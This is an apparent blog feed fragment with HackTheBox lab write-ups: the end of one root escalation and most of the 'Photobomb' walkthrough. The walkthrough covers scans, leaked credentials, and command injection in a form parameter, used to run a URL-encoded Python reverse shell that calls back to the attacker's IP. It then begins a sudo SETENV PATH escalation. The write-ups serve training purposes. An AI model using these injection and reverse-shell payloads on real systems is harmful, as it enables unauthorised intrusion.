&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> 15: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:208:in &lt;span style="color:#b8bb26">`&lt;/span>visit_Psych_Nodes_Mapping&lt;span style="color:#b8bb26">&amp;#39;
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26"> 14: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:394:in `revive&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> 13: from /usr/lib/ruby/2.7.0/psych/visitors/to_ruby.rb:402:in &lt;span style="color:#b8bb26">`&lt;/span>init_with&lt;span style="color:#b8bb26">&amp;#39;
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26"> 12: from /usr/lib/ruby/vendor_ruby/rubygems/requirement.rb:218:in `init_with&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> 11: from /usr/lib/ruby/vendor_ruby/rubygems/requirement.rb:214:in &lt;span style="color:#b8bb26">`&lt;/span>yaml_initialize&lt;span style="color:#b8bb26">&amp;#39;
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26"> 10: from /usr/lib/ruby/vendor_ruby/rubygems/requirement.rb:299:in `fix_syck_default_key_in_requirements&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> 9: from /usr/lib/ruby/vendor_ruby/rubygems/package/tar_reader.rb:59:in &lt;span style="color:#b8bb26">`&lt;/span>each&lt;span style="color:#b8bb26">&amp;#39;
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26"> 8: from /usr/lib/ruby/vendor_ruby/rubygems/package/tar_header.rb:101:in `from&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> 7: from /usr/lib/ruby/2.7.0/net/protocol.rb:152:in &lt;span style="color:#b8bb26">`&lt;/span>read&lt;span style="color:#b8bb26">&amp;#39;
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26"> 6: from /usr/lib/ruby/2.7.0/net/protocol.rb:319:in `LOG&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> 5: from /usr/lib/ruby/2.7.0/net/protocol.rb:464:in &lt;span style="color:#b8bb26">`&lt;/span>&amp;lt;&amp;lt;&lt;span style="color:#b8bb26">&amp;#39;
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26"> 4: from /usr/lib/ruby/2.7.0/net/protocol.rb:458:in `write&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> 3: from /usr/lib/ruby/vendor_ruby/rubygems/request_set.rb:388:in &lt;span style="color:#b8bb26">`&lt;/span>resolve&lt;span style="color:#b8bb26">&amp;#39;
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26"> 2: from /usr/lib/ruby/2.7.0/net/protocol.rb:464:in `&amp;lt;&amp;lt;&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> 1: from /usr/lib/ruby/2.7.0/net/protocol.rb:458:in &lt;span style="color:#b8bb26">`&lt;/span>write&lt;span style="color:#b8bb26">&amp;#39;
&lt;/span>&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#b8bb26">/usr/lib/ruby/2.7.0/net/protocol.rb:458:in `system&amp;#39;&lt;/span>: no implicit conversion of nil into String &lt;span style="color:#fe8019">(&lt;/span>TypeError&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>henry@precious:/tmp/test$ /usr/bin/bash -p
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>bash-5.1# whoami
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>root
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>bash-5.1# id
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>uid&lt;span style="color:#fe8019">=&lt;/span>1000&lt;span style="color:#fe8019">(&lt;/span>henry&lt;span style="color:#fe8019">)&lt;/span> gid&lt;span style="color:#fe8019">=&lt;/span>1000&lt;span style="color:#fe8019">(&lt;/span>henry&lt;span style="color:#fe8019">)&lt;/span> euid&lt;span style="color:#fe8019">=&lt;/span>0&lt;span style="color:#fe8019">(&lt;/span>root&lt;span style="color:#fe8019">)&lt;/span> groups&lt;span style="color:#fe8019">=&lt;/span>1000&lt;span style="color:#fe8019">(&lt;/span>henry&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>bash-5.1#
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div></content></item><item><title>Photobomb | HackTheBox</title><link>https://h4r1337.github.io/posts/photobomb/</link><pubDate>Sun, 12 Feb 2023 00:07:40 +0530</pubDate><guid>https://h4r1337.github.io/posts/photobomb/</guid><description>&lt;h2 id="overview">Overview&lt;/h2>
&lt;img src="https://h4r1337.github.io/img/photobomb/cover.webp" alt="">&lt;table>
&lt;thead>
&lt;tr>
&lt;th style="text-align: center">Title&lt;/th>
&lt;th style="text-align: center">&lt;a href="https://app.hackthebox.com/machines/Photobomb">photobomb&lt;/a>&lt;/th>
&lt;/tr>
&lt;/thead>
&lt;tbody>
&lt;tr>
&lt;td style="text-align: center">Difficulty&lt;/td>
&lt;td style="text-align: center">Easy&lt;/td>
&lt;/tr>
&lt;tr>
&lt;td style="text-align: center">Machine&lt;/td>
&lt;td style="text-align: center">Linux&lt;/td>
&lt;/tr>
&lt;tr>
&lt;td style="text-align: center">Maker&lt;/td>
&lt;td style="text-align: center">&lt;a href="https://app.hackthebox.com/users/85231">&lt;img src="https://www.hackthebox.com/badge/image/85231" alt="" style="display: unset">&lt;/a>&lt;/td>
&lt;/tr>
&lt;/tbody>
&lt;/table>
&lt;div
class="alert alert-tip collapsed"
style="border-color: #bdbb26;"
>
&lt;div
class="alert-heading-box"
onclick="toggleAlert(this)"
>
&lt;i
class="bx bx-bulb"
style="color: #bdbb26;"
>&lt;/i>
&lt;p
class="alert-heading"
style="color: #bdbb26"
>
About Photobomb
&lt;/p>
&lt;i
class='bx bx-chevron-down collapsed'
style="color: #bdbb26;"
>&lt;/i>
&lt;/div>
&lt;div class="alert-content" style="display: none;">
&lt;p>In this easy machine we will use the plain text password used in a js file to log in to the server at port 80. Then by exploiting an RCE on a vulnerable endpoint we will gain initial access to the machine. From there we will privesc to root by abusing the setenv directive&lt;/p></description><content>&lt;h2 id="overview">Overview&lt;/h2>
&lt;img src="https://h4r1337.github.io/img/photobomb/cover.webp" alt="">&lt;table>
&lt;thead>
&lt;tr>
&lt;th style="text-align: center">Title&lt;/th>
&lt;th style="text-align: center">&lt;a href="https://app.hackthebox.com/machines/Photobomb">photobomb&lt;/a>&lt;/th>
&lt;/tr>
&lt;/thead>
&lt;tbody>
&lt;tr>
&lt;td style="text-align: center">Difficulty&lt;/td>
&lt;td style="text-align: center">Easy&lt;/td>
&lt;/tr>
&lt;tr>
&lt;td style="text-align: center">Machine&lt;/td>
&lt;td style="text-align: center">Linux&lt;/td>
&lt;/tr>
&lt;tr>
&lt;td style="text-align: center">Maker&lt;/td>
&lt;td style="text-align: center">&lt;a href="https://app.hackthebox.com/users/85231">&lt;img src="https://www.hackthebox.com/badge/image/85231" alt="" style="display: unset">&lt;/a>&lt;/td>
&lt;/tr>
&lt;/tbody>
&lt;/table>
&lt;div
class="alert alert-tip collapsed"
style="border-color: #bdbb26;"
>
&lt;div
class="alert-heading-box"
onclick="toggleAlert(this)"
>
&lt;i
class="bx bx-bulb"
style="color: #bdbb26;"
>&lt;/i>
&lt;p
class="alert-heading"
style="color: #bdbb26"
>
About Photobomb
&lt;/p>
&lt;i
class='bx bx-chevron-down collapsed'
style="color: #bdbb26;"
>&lt;/i>
&lt;/div>
&lt;div class="alert-content" style="display: none;">
&lt;p>In this easy machine we will use the plain text password used in a js file to log in to the server at port 80. Then by exploiting an RCE on a vulnerable endpoint we will gain initial access to the machine. From there we will privesc to root by abusing the setenv directive&lt;/p>
&lt;/div>
&lt;/div>
&lt;script>
function toggleAlert(headerElement) {
var alertBox = headerElement.parentElement;
var alertContent = alertBox.querySelector('.alert-content');
var icon = headerElement.querySelectorAll('i')[1];
alertBox.classList.toggle('open');
alertBox.classList.toggle('collapsed');
if (alertBox.classList.contains('open')) {
alertContent.style.display = 'block';
icon.classList.remove('open');
icon.classList.add('collapsed');
} else {
icon.classList.remove('collapsed');
icon.classList.add('open');
alertContent.style.display = 'none';
}
}
&lt;/script>
&lt;h1 id="information-gathering">Information Gathering&lt;/h1>
&lt;p>Scanned all TCP ports:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span> nmap -p- -T4 --min-rate &lt;span style="color:#d3869b">10000&lt;/span> -oA nmap/ports 10.10.11.182
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Nmap scan report &lt;span style="color:#fe8019">for&lt;/span> photobomb.htb &lt;span style="color:#fe8019">(&lt;/span>10.10.11.182&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Host is up &lt;span style="color:#fe8019">(&lt;/span>0.56s latency&lt;span style="color:#fe8019">)&lt;/span>.
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Not shown: &lt;span style="color:#d3869b">65489&lt;/span> filtered ports, &lt;span style="color:#d3869b">44&lt;/span> closed ports
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>PORT STATE SERVICE
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>22/tcp open ssh
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>80/tcp open http
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#928374;font-style:italic"># Nmap done at Sat Jan 21 11:44:06 2023 -- 1 IP address (1 host up) scanned in 74.49 seconds&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Enumerated open TCP ports:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span> nmap -sC -sV 10.10.11.182 -oA nmap/service
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Starting Nmap 7.80 &lt;span style="color:#fe8019">(&lt;/span> https://nmap.org &lt;span style="color:#fe8019">)&lt;/span> at 2023-01-21 11:44 IST
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Nmap scan report &lt;span style="color:#fe8019">for&lt;/span> photobomb.htb &lt;span style="color:#fe8019">(&lt;/span>10.10.11.182&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Host is up &lt;span style="color:#fe8019">(&lt;/span>0.52s latency&lt;span style="color:#fe8019">)&lt;/span>.
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Not shown: &lt;span style="color:#d3869b">995&lt;/span> closed ports
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>PORT STATE SERVICE VERSION
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 &lt;span style="color:#fe8019">(&lt;/span>Ubuntu Linux; protocol 2.0&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>80/tcp open http nginx 1.18.0 &lt;span style="color:#fe8019">(&lt;/span>Ubuntu&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>|_http-server-header: nginx/1.18.0 &lt;span style="color:#fe8019">(&lt;/span>Ubuntu&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>163/tcp filtered cmip-man
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>8649/tcp filtered unknown
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>10025/tcp filtered unknown
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Nmap &lt;span style="color:#fe8019">done&lt;/span>: &lt;span style="color:#d3869b">1&lt;/span> IP address &lt;span style="color:#fe8019">(&lt;/span>&lt;span style="color:#d3869b">1&lt;/span> host up&lt;span style="color:#fe8019">)&lt;/span> scanned in 120.20 seconds
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;h2 id="port-80---http-nginx-1180">Port 80 - HTTP (Nginx 1.18.0)&lt;/h2>
&lt;img src="https://h4r1337.github.io/img/photobomb/Pasted%20image%2020230121115108.webp" alt="">&lt;p>There&amp;rsquo;s a printer directory which requires some credentials to access.&lt;/p>
&lt;img src="https://h4r1337.github.io/img/photobomb/Pasted%20image%2020230121115159.webp" alt="">&lt;p>There&amp;rsquo;s a javascript file &lt;code>photobomb.js&lt;/code> and inside that there was the username &amp;amp; password in plain text.&lt;/p>
&lt;img src="https://h4r1337.github.io/img/photobomb/Pasted%20image%2020230121115318.webp" alt="">&lt;ul>
&lt;li>username: &lt;code>pH0t0&lt;/code>&lt;/li>
&lt;li>password: &lt;code>b0Mb!&lt;/code>&lt;/li>
&lt;/ul>
&lt;img src="https://h4r1337.github.io/img/photobomb/Pasted%20image%2020230121115439.webp" alt="">&lt;p>We can download images with various aspect ratio from this page. The request is like this:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-http" data-lang="http">&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fabd2f">POST&lt;/span> /printer &lt;span style="color:#fe8019">HTTP&lt;/span>&lt;span style="color:#fe8019">/&lt;/span>&lt;span style="color:#d3869b">1.1&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Host&lt;span style="color:#fe8019">:&lt;/span> photobomb.htb
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>User-Agent&lt;span style="color:#fe8019">:&lt;/span> Mozilla/5.0 (X11; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Accept&lt;span style="color:#fe8019">:&lt;/span> text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Accept-Language&lt;span style="color:#fe8019">:&lt;/span> en-US,en;q=0.5
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Accept-Encoding&lt;span style="color:#fe8019">:&lt;/span> gzip, deflate
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Content-Type&lt;span style="color:#fe8019">:&lt;/span> application/x-www-form-urlencoded
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Content-Length&lt;span style="color:#fe8019">:&lt;/span> 78
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Origin&lt;span style="color:#fe8019">:&lt;/span> http://photobomb.htb
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Authorization&lt;span style="color:#fe8019">:&lt;/span> Basic cEgwdDA6YjBNYiE=
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Connection&lt;span style="color:#fe8019">:&lt;/span> keep-alive
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Referer&lt;span style="color:#fe8019">:&lt;/span> http://photobomb.htb/prin
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&amp;amp;filetype=jpg&amp;amp;dimensions=3000x2000
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>I tried changing &lt;code>photo&lt;/code> parameter to &lt;code>../../../../../../etc/passwd&lt;/code> and it throws an error:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-http" data-lang="http">&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fabd2f">POST&lt;/span> /printer &lt;span style="color:#fe8019">HTTP&lt;/span>&lt;span style="color:#fe8019">/&lt;/span>&lt;span style="color:#d3869b">1.1&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Host&lt;span style="color:#fe8019">:&lt;/span> photobomb.htb
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>User-Agent&lt;span style="color:#fe8019">:&lt;/span> Mozilla/5.0 (X11; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Accept&lt;span style="color:#fe8019">:&lt;/span> text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Accept-Language&lt;span style="color:#fe8019">:&lt;/span> en-US,en;q=0.5
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Accept-Encoding&lt;span style="color:#fe8019">:&lt;/span> gzip, deflate
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Referer&lt;span style="color:#fe8019">:&lt;/span> http://photobomb.htb/printer
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Content-Length&lt;span style="color:#fe8019">:&lt;/span> 65
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Origin&lt;span style="color:#fe8019">:&lt;/span> http://photobomb.htb
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Connection&lt;span style="color:#fe8019">:&lt;/span> keep-alive
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Upgrade-Insecure-Requests&lt;span style="color:#fe8019">:&lt;/span> 1
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Content-Type&lt;span style="color:#fe8019">:&lt;/span> application/x-www-form-urlencoded
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Authorization&lt;span style="color:#fe8019">:&lt;/span> Basic cEgwdDA6YjBNYiE=
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Pragma&lt;span style="color:#fe8019">:&lt;/span> no-cache
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Cache-Control&lt;span style="color:#fe8019">:&lt;/span> no-cache
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>photo=../../../../../../etc/passwd&amp;amp;filetype=&amp;amp;dimensions=3000x2000
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>which results in an error:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-http" data-lang="http">&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fe8019">HTTP&lt;/span>&lt;span style="color:#fe8019">/&lt;/span>&lt;span style="color:#d3869b">1.1&lt;/span> &lt;span style="color:#d3869b">500&lt;/span> &lt;span style="color:#fb4934">Internal Server Error&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Server&lt;span style="color:#fe8019">:&lt;/span> nginx/1.18.0 (Ubuntu)
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Date&lt;span style="color:#fe8019">:&lt;/span> Sat, 21 Jan 2023 06:28:14 GMT
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Content-Type&lt;span style="color:#fe8019">:&lt;/span> text/html;charset=utf-8
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Content-Length&lt;span style="color:#fe8019">:&lt;/span> 14
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Connection&lt;span style="color:#fe8019">:&lt;/span> keep-alive
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>X-Xss-Protection&lt;span style="color:#fe8019">:&lt;/span> 1; mode=block
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>X-Content-Type-Options&lt;span style="color:#fe8019">:&lt;/span> nosniff
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>X-Frame-Options&lt;span style="color:#fe8019">:&lt;/span> SAMEORIGIN
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Invalid photo.
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;hr>
&lt;h1 id="exploitation">Exploitation&lt;/h1>
&lt;h2 id="rce-on-filetype-parameter">RCE on &lt;code>filetype&lt;/code> parameter&lt;/h2>
&lt;p>I tried adding RCE payloads to all parameters and &lt;code>filetype&lt;/code> parameter is vulnerable to RCE. We can test it by combining &lt;code>python&lt;/code> and &lt;code>curl&lt;/code>:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span> python3 -m http.server &lt;span style="color:#d3869b">8081&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Serving HTTP on 0.0.0.0 port &lt;span style="color:#d3869b">8081&lt;/span> &lt;span style="color:#fe8019">(&lt;/span>http://0.0.0.0:8081/&lt;span style="color:#fe8019">)&lt;/span> ...
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span> curl &lt;span style="color:#b8bb26">&amp;#39;http://photobomb.htb/printer&amp;#39;&lt;/span> -X POST -H &lt;span style="color:#b8bb26">&amp;#39;Authorization: Basic cEgwdDA6YjBNYiE=&amp;#39;&lt;/span> --data-raw &lt;span style="color:#b8bb26">&amp;#39;photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&amp;amp;filetype=jpg;curl+http://10.10.14.35:8081/&amp;amp;dimensions=3000x2000&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>And we got connection from the server:&lt;/p>
&lt;img src="https://h4r1337.github.io/img/photobomb/Pasted%20image%2020230121121051.webp" alt="">&lt;p>I went to &lt;a href="revshells.com">revshells&lt;/a> and generated the &lt;code>Python3 #1&lt;/code> reverse shell with my IP and port. Make sure it is &lt;strong>URL-encoded&lt;/strong>.&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span> curl &lt;span style="color:#b8bb26">&amp;#39;http://photobomb.htb/printer&amp;#39;&lt;/span> -X POST -H &lt;span style="color:#b8bb26">&amp;#39;Authorization: Basic cEgwdDA6YjBNYiE=&amp;#39;&lt;/span> --data-raw &lt;span style="color:#b8bb26">&amp;#39;photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&amp;amp;filetype=jpg;export%20RHOST%3D%2210.10.14.35%22%3Bexport%20RPORT%3D1234%3Bpython3%20-c%20%27import%20sys%2Csocket%2Cos%2Cpty%3Bs%3Dsocket.socket%28%29%3Bs.connect%28%28os.getenv%28%22RHOST%22%29%2Cint%28os.getenv%28%22RPORT%22%29%29%29%29%3B%5Bos.dup2%28s.fileno%28%29%2Cfd%29%20for%20fd%20in%20%280%2C1%2C2%29%5D%3Bpty.spawn%28%22bash%22%29%27&amp;amp;dimensions=3000x2000&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>We got a shell as user &lt;code>wizard&lt;/code>&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span> nc -lnvp &lt;span style="color:#d3869b">1234&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Listening on 0.0.0.0 &lt;span style="color:#d3869b">1234&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Connection received on 10.10.11.182 &lt;span style="color:#d3869b">59550&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>wizard@photobomb:~/photobomb$ id
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>id
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>uid&lt;span style="color:#fe8019">=&lt;/span>1000&lt;span style="color:#fe8019">(&lt;/span>wizard&lt;span style="color:#fe8019">)&lt;/span> gid&lt;span style="color:#fe8019">=&lt;/span>1000&lt;span style="color:#fe8019">(&lt;/span>wizard&lt;span style="color:#fe8019">)&lt;/span> groups&lt;span style="color:#fe8019">=&lt;/span>1000&lt;span style="color:#fe8019">(&lt;/span>wizard&lt;span style="color:#fe8019">)&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>wizard@photobomb:~/photobomb$ whoami
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>whoami
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>wizard
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>wizard@photobomb:~/photobomb$ &lt;span style="color:#fabd2f">pwd&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>&lt;span style="color:#fabd2f">pwd&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>/home/wizard/photobomb
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;hr>
&lt;h1 id="privilege-escalation">Privilege Escalation&lt;/h1>
&lt;h2 id="privilege-escalation-vector">Privilege Escalation vector&lt;/h2>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span>wizard@photobomb:~/photobomb$ sudo -l
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>sudo -l
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>Matching Defaults entries &lt;span style="color:#fe8019">for&lt;/span> wizard on photobomb:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> env_reset, mail_badpass,
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> secure_path&lt;span style="color:#fe8019">=&lt;/span>/usr/local/sbin&lt;span style="color:#b8bb26">\:&lt;/span>/usr/local/bin&lt;span style="color:#b8bb26">\:&lt;/span>/usr/sbin&lt;span style="color:#b8bb26">\:&lt;/span>/usr/bin&lt;span style="color:#b8bb26">\:&lt;/span>/sbin&lt;span style="color:#b8bb26">\:&lt;/span>/bin&lt;span style="color:#b8bb26">\:&lt;/span>/snap/bin
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>User wizard may run the following commands on photobomb:
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span> &lt;span style="color:#fe8019">(&lt;/span>root&lt;span style="color:#fe8019">)&lt;/span> SETENV: NOPASSWD: /opt/cleanup.sh
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>&lt;code>SETENV&lt;/code> directive is set. So we can change the &lt;code>PATH&lt;/code> variable and run the script with root access. If you want to know more about this attack, check out:&lt;/p>
&lt;ul>
&lt;li>&lt;a href="https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/">hackingarticles.in&lt;/a>&lt;/li>
&lt;li>&lt;a href="https://book.hacktricks.xyz/linux-hardening/privilege-escalation#setenv">hacktricks.xyz&lt;/a>&lt;/li>
&lt;/ul>
&lt;p>&lt;code>/opt/cleanup.sh :&lt;/code>&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span>&lt;span style="color:#8ec07c">#!/bin/bash
